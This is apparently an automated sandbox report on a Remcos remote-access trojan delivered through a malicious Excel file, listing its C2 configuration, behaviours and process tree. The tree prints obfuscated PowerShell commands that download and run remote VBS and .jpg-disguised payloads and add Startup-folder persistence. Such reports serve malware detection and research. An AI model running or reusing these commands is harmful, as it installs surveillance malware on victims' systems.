remcos | 0ef76ce10558c86b6d359cd9da83a8fe3ba2dc2f36267447f4e191aaa4aa3125

General

Target

Payment Remittance.xls
Size

79KB
MD5

e12d4ea1d922a7bf268e0133163a92f6
SHA1

b02e8013f9695756d9fab1a5b677bbb39b3e48d7
SHA256

0ef76ce10558c86b6d359cd9da83a8fe3ba2dc2f36267447f4e191aaa4aa3125
SHA512

c9eb96bf6445fd3f3336bf2649caf6e511ae831e95e580e7b8663288e623fa89660afa5f04334d6877b91e3924b8cf567f55514310224698c89e49e090e965a7

Score

10^/10

remcos augb22 rat

Malware Config

Extracted

Family

remcos

Botnet

AUGB22

C2

saptransmissions.dvrlists.com:55026

Attributes

audio_folder
MicRecords
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
install_path
%AppData%
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
AUGB22
keylog_path
%AppData%
mouse_option
false
mutex
AUGB22-35AN4B
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5
take_screenshot_title
wikipedia;solitaire;

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3676	1084	cmd.exe	EXCEL.EXE

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

14 2720 powershell.exe
21 3720 powershell.exe

flow	pid	process
14	2720	powershell.exe
21	3720	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

3720 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3720 set thread context of 4104 3720 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
3720	powershell.exe

description	pid	process	target process
PID 3720 set thread context of 4104	3720	powershell.exe	RegAsm.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 30 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000239f206ed0275586cfcd159a827d6fa3eed1a7b467e2d644ead3e75400b85f90000000000e80000000020000200000000bfe10abc85ab7566fefb9b7aee1108753168a835893f3af1111e7649eb2f38f20000000c4770494c7529f13482d0b39eb9d249cb8a6ea0771391d50b00d4bc9ebd1db7940000000aa5b52a58a28d0ef5fa1a9bd53f20e70da2b89bbdd0f9e59edcb17596f3375be9bfa46d5a46e0614b11fc59bf645045d97a98eb9629edaffd30f40b6fabf2d55	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3507782510"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{FC9CA667-1ED3-11ED-B696-5203DB9D3E0F} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30978784"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0ff72d2e0b2d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3507782510"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30978784"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 903081d2e0b2d801	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b14216000000000200000000001066000000010000200000008845d3329d7ed44f5aa6914d44a72464060a1aaf9b2ae8b23b360786ece00fc2000000000e800000000200002000000059c59151cea9b951534e56cfdbe35239d20b27fe4cfa46465076b05a7b891fb020000000ce045f11ca247c07746378f4b8bbe35c27ad952d6bd53a62e0ee5e3282363c504000000007e630f390c652aff7bf2faddd6d35a35b3c1b0eaf244936cb5fb29e01d6182dbf6fe76075a7c5ade9f20740e63662836f955043f8b889a2b280ebd08ac9a4c3	iexplore.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings powershell.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1084 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2720 powershell.exe
2720 powershell.exe
3720 powershell.exe
3748 powershell.exe
3720 powershell.exe
3748 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe

pid	process
2720	powershell.exe
2720	powershell.exe
3720	powershell.exe
3748	powershell.exe
3720	powershell.exe
3748	powershell.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	3748	powershell.exe
Token: SeIncreaseQuotaPrivilege	3720	powershell.exe
Token: SeSecurityPrivilege	3720	powershell.exe
Token: SeTakeOwnershipPrivilege	3720	powershell.exe
Token: SeLoadDriverPrivilege	3720	powershell.exe
Token: SeSystemProfilePrivilege	3720	powershell.exe
Token: SeSystemtimePrivilege	3720	powershell.exe
Token: SeProfSingleProcessPrivilege	3720	powershell.exe
Token: SeIncBasePriorityPrivilege	3720	powershell.exe
Token: SeCreatePagefilePrivilege	3720	powershell.exe
Token: SeBackupPrivilege	3720	powershell.exe
Token: SeRestorePrivilege	3720	powershell.exe
Token: SeShutdownPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeSystemEnvironmentPrivilege	3720	powershell.exe
Token: SeRemoteShutdownPrivilege	3720	powershell.exe
Token: SeUndockPrivilege	3720	powershell.exe
Token: SeManageVolumePrivilege	3720	powershell.exe
Token: 33	3720	powershell.exe
Token: 34	3720	powershell.exe
Token: 35	3720	powershell.exe
Token: 36	3720	powershell.exe
Token: SeIncreaseQuotaPrivilege	3720	powershell.exe
Token: SeSecurityPrivilege	3720	powershell.exe
Token: SeTakeOwnershipPrivilege	3720	powershell.exe
Token: SeLoadDriverPrivilege	3720	powershell.exe
Token: SeSystemProfilePrivilege	3720	powershell.exe
Token: SeSystemtimePrivilege	3720	powershell.exe
Token: SeProfSingleProcessPrivilege	3720	powershell.exe
Token: SeIncBasePriorityPrivilege	3720	powershell.exe
Token: SeCreatePagefilePrivilege	3720	powershell.exe
Token: SeBackupPrivilege	3720	powershell.exe
Token: SeRestorePrivilege	3720	powershell.exe
Token: SeShutdownPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeSystemEnvironmentPrivilege	3720	powershell.exe
Token: SeRemoteShutdownPrivilege	3720	powershell.exe
Token: SeUndockPrivilege	3720	powershell.exe
Token: SeManageVolumePrivilege	3720	powershell.exe
Token: 33	3720	powershell.exe
Token: 34	3720	powershell.exe
Token: 35	3720	powershell.exe
Token: 36	3720	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

3164 iexplore.exe

pid	process
3164	iexplore.exe

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

EXCEL.EXEiexplore.exeIEXPLORE.EXERegAsm.exe

pid	process
1084	EXCEL.EXE
1084	EXCEL.EXE
1084	EXCEL.EXE
1084	EXCEL.EXE
1084	EXCEL.EXE
1084	EXCEL.EXE
1084	EXCEL.EXE
1084	EXCEL.EXE
1084	EXCEL.EXE
1084	EXCEL.EXE
1084	EXCEL.EXE
1084	EXCEL.EXE
3164	iexplore.exe
3164	iexplore.exe
3240	IEXPLORE.EXE
3240	IEXPLORE.EXE
4104	RegAsm.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeiexplore.exeWScript.exepowershell.exe

description	pid	process	target process
PID 1084 wrote to memory of 3676	1084	EXCEL.EXE	cmd.exe
PID 1084 wrote to memory of 3676	1084	EXCEL.EXE	cmd.exe
PID 3676 wrote to memory of 2720	3676	cmd.exe	powershell.exe
PID 3676 wrote to memory of 2720	3676	cmd.exe	powershell.exe
PID 2720 wrote to memory of 240	2720	powershell.exe	WScript.exe
PID 2720 wrote to memory of 240	2720	powershell.exe	WScript.exe
PID 3164 wrote to memory of 3240	3164	iexplore.exe	IEXPLORE.EXE
PID 3164 wrote to memory of 3240	3164	iexplore.exe	IEXPLORE.EXE
PID 3164 wrote to memory of 3240	3164	iexplore.exe	IEXPLORE.EXE
PID 240 wrote to memory of 3720	240	WScript.exe	powershell.exe
PID 240 wrote to memory of 3720	240	WScript.exe	powershell.exe
PID 240 wrote to memory of 3748	240	WScript.exe	powershell.exe
PID 240 wrote to memory of 3748	240	WScript.exe	powershell.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe
PID 3720 wrote to memory of 4104	3720	powershell.exe	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Payment Remittance.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Urhjg.bat" "
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -WindowStyle hidden IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICdTaWxlbnRseUNvbnRpbnVlJzskdTBoajQ0dHQgPSAnW0VudW1dOjpUb09iamVjdChbU3lzdGVtLk4nICsnZXQuU2VjdXJpJyArJ3R5UHJvdG8nICsnY29sVHlwZV0sIDMwNzIpJ3xJRVg7W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgPSAkdTBoajQ0dDskd2UyMj0nZVcudGVOIHRjJyArICdlamJPLXdlTignOyAkYjRkZj0nb2xud29ELil0bmVpJyArICdsQ2InOyAkYzM9JyknJ3Nidi50aW1lUlwnJytwbWV0OnZuZSQsJydzYnYudG51b2NzaUQvc2VsYVMvMTAxLjA0Mi4wMTIuMjkxLy86cHR0aCcnKGVsaUZkYSc7JFRDPSRjMywkYjRkZiwkd2UyMiAtSm9pbiAnJztJRVgoKFtyZWdleF06Ok1hdGNoZXMoJFRDLCcuJywnUmlnaHRUb0xlZnQnKSB8IEZvckVhY2ggeyRfLnZhbHVlfSkgLWpvaW4gJycpO3N0YXJ0LXByb2Nlc3MoJGVudjp0ZW1wKyAnXFJlbWl0LnZicycpO3JlbW92ZS1pdGVtICgkZW52OlVTRVJQUk9GSUxFICsgJ1xVcmhqZy5iYXQnKQ==')))
3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Remit.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110010,00110100,00110000,00101110,00110001,00110000,00110001,00101111,01000001,01100111,01101001,01101110,01100111,00101111,01010011,01110100,01100001,01110100,01100101,01101101,01100101,01101110,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:4104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\Remit.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Remit.vbs'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3748

C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
1⤵
PID:1748

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3164

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3164 CREDAT:17410 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3240

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9204329578627dfbb5aea7f3e7b679a7

SHA1
5b4c08581babdc35a3cba9f7a14c97ccbda90f49

SHA256
e272ebb51518b52fdfc30889109d5526c7cad86996df5bfea2dad36df8ffc938

SHA512
0a9c851e4d8536331c3d8cd1d14a75f74a8a55bde0ad04b353e216b9bcce848daca7a5d26bda5c3ebd2e3c0bf91b65c3027a1cd211181f4ea89a0003dec8ae15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c8c2e08d021c49fc945479d3c2e4c6e6

SHA1
8d9064f6507726533e4015706e3c7917efec7f2d

SHA256
7619c29d0c8d0eac9e3f96edca07f297558b91ba8744870eb34b3982889d6e15

SHA512
efcb3265d5d2236108e0217d0ee51d978d1790acc750ca8afc58092fa303f196cc25102637ccb86e1cb89352daf35f3c3634518abfb08a5a54ec8ad01030d61a

Download Submit
C:\Users\Admin\AppData\Local\Temp\0b11dad3-e15c-4937-b805-b2895dc6b4e7\AgileDotNetRT64.dll
Filesize
75KB

MD5
42b2c266e49a3acd346b91e3b0e638c0

SHA1
2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

SHA256
adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

SHA512
770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Download Submit
C:\Users\Admin\AppData\Local\Temp\Remit.vbs
Filesize
2KB

MD5
dda8f5c12fe09dd7c4261d41615bf697

SHA1
c96a3872d665050edd90fec45bcf18086463a0be

SHA256
055d31c21414c88c3ffd5794ae798b5a5dcd1345cf42dda8c73b09ca79b0ee11

SHA512
8a2e26fd99813fb07180710bfbf721b3fa6a5a4e06cf06d5b186b9b4c3e9aff795543d68cf83d06bf362a7bc6c549583a61156b11df7f41fd5ebbb882fd310eb

Download Submit
C:\Users\Admin\Urhjg.bat
Filesize
839B

MD5
46b56c8fca816fea66b2dcea221e1ee1

SHA1
8f92a4a1fb35ec3ae9e96422db9e82285e34c80c

SHA256
da185578464c981924d79ec49c6be913a859c300b181671de7edb6b338d37229

SHA512
d945e020c5f4a30fa2e3b4f8dba0917c999627c37d87d21e1bae299382b42a59d01ddc5427c3249186bdc53daf40d84ef4d67578901d50a2d9019b1181afed76

Download Submit
memory/240-144-0x0000000000000000-mapping.dmp

Download
memory/1084-135-0x00007FFBF61B0000-0x00007FFBF61C0000-memory.dmp

Filesize
64KB

Download
memory/1084-138-0x00007FFBF3960000-0x00007FFBF3970000-memory.dmp

Filesize
64KB

Download
memory/1084-137-0x00007FFBF3960000-0x00007FFBF3970000-memory.dmp

Filesize
64KB

Download
memory/1084-136-0x00007FFBF61B0000-0x00007FFBF61C0000-memory.dmp

Filesize
64KB

Download
memory/1084-132-0x00007FFBF61B0000-0x00007FFBF61C0000-memory.dmp

Filesize
64KB

Download
memory/1084-134-0x00007FFBF61B0000-0x00007FFBF61C0000-memory.dmp

Filesize
64KB

Download
memory/1084-133-0x00007FFBF61B0000-0x00007FFBF61C0000-memory.dmp

Filesize
64KB

Download
memory/2720-142-0x000002186C7A0000-0x000002186C7C2000-memory.dmp

Filesize
136KB

Download
memory/2720-146-0x00007FFC0D210000-0x00007FFC0DCD1000-memory.dmp

Filesize
10.8MB

Download
memory/2720-143-0x00007FFC0D210000-0x00007FFC0DCD1000-memory.dmp

Filesize
10.8MB

Download
memory/2720-141-0x0000000000000000-mapping.dmp

Download
memory/3676-139-0x0000000000000000-mapping.dmp

Download
memory/3720-147-0x0000000000000000-mapping.dmp

Download
memory/3720-155-0x00007FFC0F270000-0x00007FFC0F3BE000-memory.dmp

Filesize
1.3MB

Download
memory/3720-151-0x00007FFC0CAB0000-0x00007FFC0D571000-memory.dmp

Filesize
10.8MB

Download
memory/3720-163-0x00007FFC0CAB0000-0x00007FFC0D571000-memory.dmp

Filesize
10.8MB

Download
memory/3748-148-0x0000000000000000-mapping.dmp

Download
